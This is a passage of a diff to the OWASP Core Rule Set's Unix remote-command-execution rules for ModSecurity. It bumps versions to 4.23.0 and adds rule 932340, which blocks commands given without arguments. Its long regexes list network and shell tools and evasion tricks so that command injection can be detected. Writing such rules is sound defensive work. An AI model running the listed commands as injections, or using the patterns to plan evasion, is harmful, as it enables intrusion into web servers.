(?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:a(?:ddgroup|nsible|pparmor_[^\s\x0b]{1,10}\b|rj(?:-register|disp)|tobm[\s\x0b&\),<>\|]|u(?:ditctl|repot|search))|b(?:ase(?:32|64|nc)|(?:lkid|rwap|yobu)[\s\x0b&\),<>\|]|sd(?:cat|iff|tar)|u(?:iltin|nzip2|sybox)|z(?:c(?:at|mp)[\s\x0b&\),<>\|]|diff|e(?:grep|xe[\s\x0b&\),<>\|])|f?grep|ip2(?:[\s\x0b&\),<>\|]|recover)|less|more))|c(?:[89]9-gcc|h(?:(?:attr|mod|o(?:om|wn)|sh)[\s\x0b&\),<>\|]|ef-|g(?:passwd|rp[\s\x0b&\),<>\|])|pass)|lang\+\+|o(?:bc(?:[\s\x0b&\),<>\|]|run)|mm[\s\x0b&\),<>\|]|proc)|(?:p(?:an|io)|scli)[\s\x0b&\),<>\|])|d(?:(?:iff|mesg|vips)[\s\x0b&\),<>\|]|o(?:as[\s\x0b&\),<>\|]|cker-)|pkg[\s\x0b&\),\-<>\|])|e(?:2fsck|(?:fax|grep|macs|nd(?:if|sw)|sac|xpr)[\s\x0b&\),<>\|])|f(?:d(?:(?:find|isk)[\s\x0b&\),<>\|]|u?mount)|grep[\s\x0b&\),<>\|]|iletest|ping[\s\x0b&\),6<>\|]|tp(?:stats|who))|g(?:(?:core|insh|z(?:cat|exe|ip))[\s\x0b&\),<>\|]|(?:etca|unzi)p|hc(?:-[\s\x0b&\),<>\|]|i[\s\x0b&\),\-<>\|])|r(?:(?:cat|ep)[\s\x0b&\),<>\|]|oupmod))|(?:htop|jexec)[\s\x0b&\),<>\|]|i(?:(?:conv|ftop)[\s\x0b&\),<>\|]|pp(?:eveprinter|find|tool))|l(?:ast(?:comm[\s\x0b&\),<>\|]|log(?:in)?)|ess(?:echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|get)|osetup|s(?:(?:-F|cpu|hw|mod|of|pci|usb)[\s\x0b&\),<>\|]|b_release)|wp-download|z(?:4c(?:[\s\x0b&\),<>\|]|at)|c(?:at|mp)[\s\x0b&\),<>\|]|diff|[ef]?grep|less|m(?:a(?:[\s\x0b&\),<>\|]|dec|info)|ore)))|m(?:a(?:ilq|wk)[\s\x0b&\),<>\|]|k(?:fifo|nod[\s\x0b&\),<>\|]|temp)|locate|ysql(?:[\s\x0b&\),<>\|]|admin|dump(?:slow)?|hotcopy|show))|n(?:(?:a(?:sm|wk)|(?:ma|ohu)p|ping|roff|stat)[\s\x0b&\),<>\|]|c(?:\.(?:openbsd|traditional)|at[\s\x0b&\),<>\|])|et(?:(?:c|st)at|kit-ftp|plan))|o(?:nintr|pkg[\s\x0b&\),<>\|])|p(?:d(?:b(?:2mb|3[\s\x0b&\),\.<>\|])|ksh[\s\x0b&\),<>\|])|(?:er(?:f|l5?)|(?:ft|gre)p|i(?:gz|ng6)|(?:op|ush)d|s(?:ed|ql))[\s\x0b&\),<>\|]|hp(?:-cgi|[57][\s\x0b&\),<>\|])|k(?:exec|ill[\s\x0b&\),<>\|])|rint(?:env|f[\s\x0b&\),<>\|])|tar(?:[\s\x0b&\),<>\|]|diff|grep)|y(?:3?versions|thon[23]))|r(?:(?:aku|bash|nano|pmdb|unc|vi(?:ew|m))[\s\x0b&\),<>\|]|e(?:alpath|boot[\s\x0b&\),<>\|])|m(?:dir[\s\x0b&\),<>\|]|t-(?:dump|tar)|user)|sync(?:-ssl|[\s\x0b&\),<>\|]))|s(?:(?:diff|ftp|lsh|ocat)[\s\x0b&\),<>\|]|e(?:ndmail[\s\x0b&\),<>\|]|t(?:cap|env|sid))|h(?:\.distrib|uf[\s\x0b&\),<>\|])|sh-(?:a(?:dd|gent)|copy-id)|udo(?:-rs|[\s\x0b&\),<>_\|]|edit|replay)|vn(?:a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|version)|ysctl)|t(?:(?:ailf|ftp|imeout|mux)[\s\x0b&\),<>\|]|c(?:l?sh[\s\x0b&\),<>\|]|p(?:ing|traceroute))|elnet|r(?:a(?:ceroute6?|p[\s\x0b&\),<>\|])|off[\s\x0b&\),<>\|]))|u(?:n(?:(?:ame|iq|rar|xz)[\s\x0b&\),<>\|]|lz(?:4[\s\x0b&\),<>\|]|ma)|pigz|zstd)|ser(?:(?:ad|mo)d|del))|vi(?:(?:gr|pw|rsh)[\s\x0b&\),<>\|]|sudo(?:-rs)?)|w(?:get[\s\x0b&\),<>\|]|ho(?:ami|is[\s\x0b&\),<>\|]))|x(?:(?:args|etex|more|pad|term)[\s\x0b&\),<>\|]|z(?:c(?:at|mp)[\s\x0b&\),<>\|]|d(?:ec[\s\x0b&\),<>\|]|iff)|[ef]?grep|less|more))|z(?:(?:c(?:at|mp)|diff|grep|less|run)[\s\x0b&\),<>\|]|[ef]grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|mo(?:dload|re[\s\x0b&\),<>\|])|std(?:[\s\x0b&\),<>\|]|(?:ca|m)t|grep|less)))" \ "id:932260,\ phase:2,\ block,\ @@ -567,7 +575,69 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# [ Unix command injection ] +# +# This rule is meant to block the execution of commands with no arguments when it's possible to meaningfully do so. +# False positive prone commands are not detected at PL-1. +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# .932340 (PL-1, matches commands with no arguments) +# .932350 (PL-3, matches commands with no arguments) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932340.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932340 +# +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:aptitude|d(?:f|mesg)|env|h(?:ostname|top)|(?:(?:io|vm)sta|reboo)t|l(?:ast|s)|mysql(?:[^\s\x0b]{1,10}\b)?|ps(?:ql)?|s(?:et|hutdown|u)|w(?:ho(?:ami|is)?)?)$" \ + "id:932340,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Direct Unix Command Execution (No Arguments)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'OWASP_CRS/ATTACK-RCE',\ + tag:'capec/1000/152/248/88',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -603,7 +673,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx !-\d" tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -644,7 +714,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFil tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -675,7 +745,7 @@ SecRule REQUEST_HEADERS|REQUEST_LINE "@rx ^\(\s*\)\s+\{" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -696,7 +766,7 @@ SecRule ARGS_NAMES|ARGS|FILES_NAMES "@rx ^\(\s*\)\s+\{" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -738,7 +808,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \ba[\" tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -776,7 +846,7 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VARS "!@rx (?i)(?:\.boto|buddyinfo|mtrr|acpi|zoneinfo)\B" \ @@ -873,7 +943,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -910,14 +980,14 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # @@ -941,7 +1011,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -959,6 +1029,8 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? # # .932250 (base rule, PL1, targets two and three character commands) # .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# .932340 (PL-1, matches commands with no arguments) +# .932350 (PL-3, matches commands with no arguments) # # .932240 (generic detection, PL2, targets generic evasion attempts) # .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, @@ -984,7 +1056,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 932231 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)